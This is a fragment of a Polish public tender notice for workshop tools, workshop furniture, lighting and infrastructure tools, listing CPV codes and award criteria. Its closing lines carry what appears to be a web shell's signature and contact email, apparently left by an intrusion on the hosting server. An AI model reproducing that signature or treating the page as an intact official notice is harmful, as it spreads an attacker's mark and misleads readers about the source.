SZCZYPCE BOCZNE DO CIĘCIA 7  Z SPREŻYNĄ ZAMONTOWANĄ NA OSI DO AUTOMATYCZNEGO OTWARCIA SZCZĘK
SZCZYPCE DŁUGIE DO PRZEWODÓW 19 MM L-275 MM, DO ZDEJMOWANIA PRZEWODÓW ŚWIEC, GUMOWYCH I PALIWOWYCH
SZCZYPCE DŁUGIE 275 MM PROSTE 
SZCZYPCE DO AUTOMATYCZNEGO ŚCIĄGANIA IZOLACJI V1502 lub równoważny
SZCZYPCE DO ZŁĄCZ IZOLOWANYCH 0,5-6 MM, L=250 MM
SZCZYPCE DO ZŁĄCZEK KONEKTOROWYCH 0,5 -6 MM,  250 MM,
PĘSETA PROSTA 140 MM
PĘSETA ODGIĘTA 115 MM
PĘSETA PROSTA ANTYMAGNETYCZNA 130 MM
PĘSETA PROSTA ANTYMAGNETYCZNA 140 MM
SUWMIARKA 150 MM (DOKŁADNOŚĆ 0,05 MM) SZCZĘKI 38 MM
ZESTAW PĘSET NIEMAGNETYCZNYCH KWASOODPORNYCH (6 SZT.)
CIŚNIENIOMIERZ DO OGUMIENIA 1-12 BAR (do pojazdów ciężarowych - długi)
MANOMETR KL. 1,6 0 - 0,4 Mpa TARCZA 160 M 20X1,5
CZUJNIK ZEGAROWY ZĘBATY MDHa 10/1
KLUCZ DYNAMOMETRYCZNY 1/2 20-200 Nm KLIKOWY GRZECHOTKA 32 Z ŚWIADECTWEM KALIBRACJI OPAKOWANIE TRANSPORTOWE Z TWORZYWA
KLUCZ DYNAMOMETRYCZNY 1/2 20-100 Nm KLIKOWY GRZECHOTKA 32 Z ŚWIADECTWEM KALIBRACJI OPAKOWANIE TRANSPORTOWE Z TWORZYWA
KLUCZ DYNAMOMETRYCZNY 1/2 70-350 Nm KLIKOWY GRZECHOTKA 32 Z ŚWIADECTWEM KALIBRACJI OPAKOWANIE TRANSPORTOWE Z TWORZYWA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.00.00-8, 44.51.10.00-5, 42.65.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Meble warsztatowe i wózki transportowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZAFA NARZĘDZIOWA WERSJA I
SZAFA NARZĘDZIOWA WERSJA II
SZAFA NARZĘDZIOWA WERSJA III
STÓŁ WASZTATOWY I
STÓŁ WARSZTATOWY II
STÓŁ SPAWALNICZY Z ODCIĄGIEM 
WÓZEK PLATFORMOWY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5, 34.90.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sprzęt oświetleniowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NAJAŚNICA 
LAMPA CZOŁOWA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.50.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Narzędzia na potrzeby sekcji infrastruktury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Narzędzia na potrzeby sekcji infrastruktury  m.in. pędzle, wałki malarskie, zestawy frezów, pily tarczowe, taśmy miernicze, szczypce do rur hydraulicznych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.10.00-5, 44.40.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com